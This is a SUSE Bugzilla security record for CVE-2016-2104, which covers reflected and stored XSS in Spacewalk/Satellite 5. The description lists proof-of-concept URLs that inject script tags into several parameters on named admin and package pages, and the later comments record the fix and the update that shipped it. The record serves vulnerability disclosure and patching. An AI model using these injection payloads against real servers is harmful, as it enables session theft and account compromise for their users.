Bug 974010 (CVE-2016-2104) - VUL-1: CVE-2016-2104: spacewalk: Satellite 5: stored and reflected XSS vulnerabilities
Summary: VUL-1: CVE-2016-2104: spacewalk: Satellite 5: stored and reflected XSS vulner...
Status: RESOLVED FIXED
Alias: CVE-2016-2104
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents (show other bugs)
Version: unspecified
Hardware: Other Other
: P4 - Low : Normal
Target Milestone: ---
Assignee: Galaxy Bugs
QA Contact: Security Team bot
URL: https://bugzilla.redhat.com/show_bug....
Whiteboard:
Keywords:
Depends on:
Blocks:
 
Reported: 2016-04-05 09:00 UTC by Marcus Meissner
Modified: 2016-05-20 00:15 UTC (History)
1 user (show)

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Marcus Meissner 2016-04-05 09:00:24 UTC 
via rh bugzilla https://bugzilla.redhat.com/show_bug.cgi?id=1305677

Adam Willard reports the following XSS flaws in Satellite 5:

/rhn/admin/BunchDetail.do?label=cobbler-sync-bunch"<script>alert(1)</script>

/rhn/software/packages/NameOverview.do?package_name=sac">Test<script>alert(1)</script>&search_subscribed_channels=yes&channel_filter=539

/rhn/software/packages/NameOverview.do?package_name=sac">Test<script>alert(1)</script>&search_subscribed_channels=yes&channel_filter=539
/rhn/software/packages/NameOverview.do?package_name=sac">Test<script>alert(1)</script>&search_subscribed_channels=yes">test<script>alert(2)</script>&channel_filter=539"><script>alert(3)</script>

<input type="hidden" name="package_name" value="sac">Test<script>alert(1)</script>" />
<input type="hidden" name="search_subscribed_channels" value="yes">test<script>alert(2)</script>" />
<input type="hidden" name="channel_filter" value="539"><script>alert(3)</script>" />
Comment 2 Swamp Workflow Management 2016-04-05 22:00:24 UTC 
bugbot adjusting priority
Comment 3 Silvio Moioli 2016-04-19 20:38:46 UTC 
Merged.

Closing this bug as fixed, thanks everyone for cooperation.
Comment 4 Swamp Workflow Management 2016-05-20 00:15:47 UTC 
SUSE-SU-2016:1367-1: An update that solves 5 vulnerabilities and has 24 fixes is now available.

Category: security (moderate)
Bug References: 922740,924298,958923,961002,961565,962253,966622,966737,966890,968257,968406,968851,970223,970425,970550,970672,970901,970989,971237,972341,973162,973432,973550,974010,974011,974315,976194,976826,978166
CVE References: CVE-2015-0284,CVE-2016-2103,CVE-2016-2104,CVE-2016-3079,CVE-2016-3097
Sources used:
SUSE Manager 2.1 (src):    cobbler-2.2.2-0.61.2, osad-5.11.33.11-15.2, rhnlib-2.5.69.8-11.2, spacewalk-backend-2.1.55.25-24.5, spacewalk-branding-2.1.33.16-18.2, spacewalk-certs-tools-2.1.6.10-18.3, spacewalk-java-2.1.165.23-20.1, spacewalk-utils-2.1.27.15-12.7, suseRegisterInfo-2.1.12-14.2, susemanager-2.1.24-23.1, susemanager-sync-data-2.1.15-30.2, susemanager-tftpsync-2.1.2-11.2